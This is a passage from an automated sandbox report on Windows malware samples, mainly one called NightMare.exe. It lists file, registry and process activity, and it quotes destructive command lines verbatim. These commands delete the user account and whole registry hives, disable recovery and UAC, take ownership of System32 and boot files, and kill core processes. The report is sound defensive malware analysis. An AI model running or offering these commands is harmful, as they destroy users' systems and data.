| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2591).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3531).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7772).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7853).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8824).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9623).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2519).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4974).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6225).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8187).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4080).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1164).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1848).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3348).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\Help = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\SizeNESW = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\SizeNWSE = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\UpArrow = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\Hand = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\NWPen = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\SizeWE = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\SizeAll = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\SizeNS = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\ = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\No = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\Wait = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Modifies File Icons
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Shell Icons\3 | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Shell Icons\4 | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Wow6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Wow6432Node | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Wow6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Wow6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Wow6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Wow6432Node\CLSID | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Wow6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5} | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Wow6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B} | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\NightMare.exe
"C:\Users\Admin\AppData\Local\Temp\NightMare.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k net user %username% /delete && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reg delete HKCR && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reg delete HKU && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reg delete HKLM && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reagentc.exe /disable && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k color 47 && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && Exit
C:\Windows\SysWOW64\net.exe
net user Admin /delete
C:\Windows\SysWOW64\reg.exe
reg delete HKU
C:\Windows\SysWOW64\reg.exe
reg delete HKCR
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /delete
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
C:\Windows\SysWOW64\ReAgentc.exe
reagentc.exe /disable
C:\Windows\SysWOW64\reg.exe
reg delete HKLM
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\taskmgr.exe && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\LogonUI.exe && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\BCD && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\drivers && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\servicing\TrustedInstaller.exe && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\system32\taskmgr.exe
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\system32\LogonUI.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\System32\WUDFHost.exe && pause
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM fontdrvhost.exe /F
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\system32\drivers
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM dwm.exe.exe /F
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM TrustedInstaller.exe.exe /F
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\System32\WUDFHost.exe
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI\BCD
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
Network
Files
memory/2740-0-0x0000000001160000-0x0000000001170000-memory.dmp
memory/2740-1-0x0000000074140000-0x000000007482E000-memory.dmp
memory/2740-2-0x0000000001090000-0x00000000010D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE.txt
| MD5 | 21ad42bd4156f914d3a265823a1c269c |
| SHA1 | 4129bc994a0947b38e3bac2aeabc8e2fbdbd503f |
| SHA256 | 680671bac3f22a5f19ffbd2c82eec069a32844cf93d419aa59319cd0cbc98ac2 |
| SHA512 | 7ec8c3801798b4fd547578d31badd96edeaacf0a91dca807c04e40ad65d97592043cb8e747947f74b9850f8e99dcd1c8f1c311cb0f8b79be301be36ca884cc5a |
memory/2740-13523-0x0000000074140000-0x000000007482E000-memory.dmp
memory/2740-19154-0x0000000001090000-0x00000000010D0000-memory.dmp
memory/2740-80006-0x0000000001090000-0x00000000010D0000-memory.dmp
memory/2740-80028-0x0000000001090000-0x00000000010D0000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
120s
Max time network
124s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 228
Network
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
120s
Max time network
123s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\GonnaCry.exe
"C:\Users\Admin\AppData\Local\Temp\GonnaCry.exe"
Network
Files
memory/2020-0-0x00000000003B0000-0x00000000004BE000-memory.dmp
memory/2020-1-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp
memory/2020-2-0x000000001B340000-0x000000001B3C0000-memory.dmp
C:\Users\Admin\Desktop\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE.txt
| MD5 | 7f0df170f9cea3f0bedc79894eb44bdf |
| SHA1 | 79a083f09bf614d80543d0c455bb27b031da8adf |
| SHA256 | 1d9712c98621bfda7f5247f6fd6ef93165db44710685438cf27a3fe5ecc1e738 |
| SHA512 | f3bb9891ae73a4ce45894b30edf753007505d6afce716d1589750721c143e8b483219196d8c6a39d56496e4b7f4b76e64fa85a5c1d000aa0bb9d1224889f9d1c |
memory/2020-803-0x000000001B340000-0x000000001B3C0000-memory.dmp
memory/2020-804-0x000007FEF5D80000-0x000007FEF676C000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Losange.exe
"C:\Users\Admin\AppData\Local\Temp\Losange.exe"
Network
Files
memory/2168-0-0x000000013F2B0000-0x000000013F2D6000-memory.dmp
memory/2168-1-0x000000013F2B0000-0x000000013F2D6000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
151s
Max time network
156s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
